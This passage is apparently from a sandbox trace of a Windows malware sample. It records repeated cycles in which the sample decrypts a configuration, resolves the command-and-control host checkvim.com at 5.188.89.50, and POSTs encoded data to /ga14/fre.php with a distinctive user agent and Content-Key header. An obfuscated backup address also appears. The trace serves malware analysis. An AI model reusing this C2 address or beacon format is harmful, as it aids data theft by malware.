ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0319.045] GetProcessHeap () returned 0x840000 [0319.045] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0319.045] GetProcessHeap () returned 0x840000 [0319.045] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0319.045] GetProcessHeap () returned 0x840000 [0319.045] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0319.045] GetProcessHeap () returned 0x840000 [0319.045] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f998 [0319.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.047] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0319.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.057] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0319.071] GetProcessHeap () returned 0x840000 [0319.071] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0319.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.072] CryptImportKey (in: hProv=0x86f248, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9b0) returned 1 [0319.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.074] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0319.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.076] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.076] GetProcessHeap () returned 0x840000 [0319.076] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0319.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.077] CryptDecrypt (in: hKey=0x87e9b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f998, pdwDataLen=0x19f9a4 | out: pbData=0x87f998, pdwDataLen=0x19f9a4) returned 1 [0319.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.078] CryptDestroyKey (hKey=0x87e9b0) returned 1 [0319.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.079] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0319.080] GetProcessHeap () returned 0x840000 [0319.080] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0319.080] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0319.081] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0319.082] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0319.082] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0319.083] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0319.083] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0319.083] GetProcessHeap () returned 0x840000 [0319.084] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0319.084] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c20*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0319.086] GetProcessHeap () returned 0x840000 [0319.086] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c88 [0319.086] socket (af=2, type=1, protocol=6) returned 0x568 [0319.086] connect (s=0x568, name=0x878c20*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0319.155] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c20*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0319.155] GetProcessHeap () returned 0x840000 [0319.155] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f930 [0319.156] GetProcessHeap () returned 0x840000 [0319.156] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0319.157] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0319.158] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0319.158] GetProcessHeap () returned 0x840000 [0319.158] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0319.158] GetProcessHeap () returned 0x840000 [0319.158] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0319.158] GetProcessHeap () returned 0x840000 [0319.158] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fbd8 [0319.158] GetProcessHeap () returned 0x840000 [0319.158] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0319.159] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0319.160] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0319.160] GetProcessHeap () returned 0x840000 [0319.160] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0319.160] GetProcessHeap () returned 0x840000 [0319.160] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0319.160] send (s=0x568, buf=0x873a58*, len=237, flags=0) returned 237 [0319.162] send (s=0x568, buf=0x87eb58*, len=159, flags=0) returned 159 [0319.162] GetProcessHeap () returned 0x840000 [0319.162] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0319.162] recv (in: s=0x568, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0319.522] GetProcessHeap () returned 0x840000 [0319.522] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0319.522] GetProcessHeap () returned 0x840000 [0319.522] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fbd8 | out: hHeap=0x840000) returned 1 [0319.523] GetProcessHeap () returned 0x840000 [0319.523] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0319.523] GetProcessHeap () returned 0x840000 [0319.523] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f930 | out: hHeap=0x840000) returned 1 [0319.523] closesocket (s=0x568) returned 0 [0319.523] GetProcessHeap () returned 0x840000 [0319.523] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c88 | out: hHeap=0x840000) returned 1 [0319.523] GetProcessHeap () returned 0x840000 [0319.523] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0319.523] GetProcessHeap () returned 0x840000 [0319.523] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0319.523] GetProcessHeap () returned 0x840000 [0319.523] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0319.523] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xb10) returned 0x568 [0319.525] Sleep (dwMilliseconds=0xea60) [0319.542] GetProcessHeap () returned 0x840000 [0319.542] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa70 [0319.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.543] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0319.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.549] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0319.555] GetProcessHeap () returned 0x840000 [0319.555] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0319.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.556] CryptImportKey (in: hProv=0x86f248, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5f0) returned 1 [0319.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.556] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0319.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.557] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.557] GetProcessHeap () returned 0x840000 [0319.557] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0319.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.558] CryptDecrypt (in: hKey=0x87e5f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa70, pdwDataLen=0x19f9a4 | out: pbData=0x87fa70, pdwDataLen=0x19f9a4) returned 1 [0319.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.559] CryptDestroyKey (hKey=0x87e5f0) returned 1 [0319.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.560] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0319.560] GetProcessHeap () returned 0x840000 [0319.560] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0319.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0319.560] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0319.561] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0319.561] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0319.562] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0319.562] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0319.562] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0319.563] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0319.563] GetProcessHeap () returned 0x840000 [0319.563] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0319.563] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0319.563] GetProcessHeap () returned 0x840000 [0319.563] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0319.563] GetProcessHeap () returned 0x840000 [0319.563] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0319.563] GetProcessHeap () returned 0x840000 [0319.563] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa70 | out: hHeap=0x840000) returned 1 [0319.563] GetProcessHeap () returned 0x840000 [0319.563] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0319.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.564] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0319.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.567] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0319.572] GetProcessHeap () returned 0x840000 [0319.572] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0319.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.573] CryptImportKey (in: hProv=0x86fa40, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e630) returned 1 [0319.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.574] CryptSetKeyParam (hKey=0x87e630, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0319.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.575] CryptSetKeyParam (hKey=0x87e630, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.575] GetProcessHeap () returned 0x840000 [0319.575] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0319.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.575] CryptDecrypt (in: hKey=0x87e630, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0319.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.576] CryptDestroyKey (hKey=0x87e630) returned 1 [0319.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0319.577] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0319.577] GetProcessHeap () returned 0x840000 [0319.577] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0319.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0319.578] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0319.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0319.579] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0319.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0319.580] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0319.580] GetProcessHeap () returned 0x840000 [0319.580] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0319.580] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871240*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0319.581] GetProcessHeap () returned 0x840000 [0319.581] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b48 [0319.581] socket (af=2, type=1, protocol=6) returned 0x56c [0319.581] connect (s=0x56c, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0319.647] FreeAddrInfoW (pAddrInfo=0x871240*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0319.647] GetProcessHeap () returned 0x840000 [0319.647] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f8a8 [0319.647] GetProcessHeap () returned 0x840000 [0319.647] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0319.647] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0319.648] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0319.648] GetProcessHeap () returned 0x840000 [0319.648] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0319.648] GetProcessHeap () returned 0x840000 [0319.648] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0319.648] GetProcessHeap () returned 0x840000 [0319.648] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0319.649] GetProcessHeap () returned 0x840000 [0319.649] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0319.649] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0319.650] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0319.650] GetProcessHeap () returned 0x840000 [0319.650] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0319.650] GetProcessHeap () returned 0x840000 [0319.650] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0319.650] send (s=0x56c, buf=0x873a58*, len=237, flags=0) returned 237 [0319.650] send (s=0x56c, buf=0x87eb58*, len=159, flags=0) returned 159 [0319.650] GetProcessHeap () returned 0x840000 [0319.650] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0319.650] recv (in: s=0x56c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0320.008] GetProcessHeap () returned 0x840000 [0320.008] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0320.008] GetProcessHeap () returned 0x840000 [0320.008] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0320.008] GetProcessHeap () returned 0x840000 [0320.008] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0320.008] GetProcessHeap () returned 0x840000 [0320.008] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f8a8 | out: hHeap=0x840000) returned 1 [0320.008] closesocket (s=0x56c) returned 0 [0320.008] GetProcessHeap () returned 0x840000 [0320.009] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b48 | out: hHeap=0x840000) returned 1 [0320.009] GetProcessHeap () returned 0x840000 [0320.009] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0320.009] GetProcessHeap () returned 0x840000 [0320.009] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0320.009] GetProcessHeap () returned 0x840000 [0320.009] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0320.009] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xae8) returned 0x56c [0320.011] Sleep (dwMilliseconds=0xea60) [0320.032] GetProcessHeap () returned 0x840000 [0320.033] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb48 [0320.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.034] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0320.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.039] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0320.045] GetProcessHeap () returned 0x840000 [0320.045] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0320.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.046] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0320.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.047] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0320.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.048] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.048] GetProcessHeap () returned 0x840000 [0320.048] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0320.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.049] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb48, pdwDataLen=0x19f9a4 | out: pbData=0x87fb48, pdwDataLen=0x19f9a4) returned 1 [0320.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.050] CryptDestroyKey (hKey=0x87e270) returned 1 [0320.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.051] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0320.051] GetProcessHeap () returned 0x840000 [0320.051] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0320.052] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0320.052] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0320.053] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0320.053] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0320.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0320.054] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0320.055] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0320.055] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0320.056] GetProcessHeap () returned 0x840000 [0320.056] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0320.056] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0320.056] GetProcessHeap () returned 0x840000 [0320.056] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0320.056] GetProcessHeap () returned 0x840000 [0320.056] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0320.056] GetProcessHeap () returned 0x840000 [0320.056] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0320.056] GetProcessHeap () returned 0x840000 [0320.056] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fd88 [0320.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.057] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0320.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.064] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fb50) returned 1 [0320.069] GetProcessHeap () returned 0x840000 [0320.069] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0320.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.071] CryptImportKey (in: hProv=0x86fb50, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7f0) returned 1 [0320.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0320.072] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0320.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 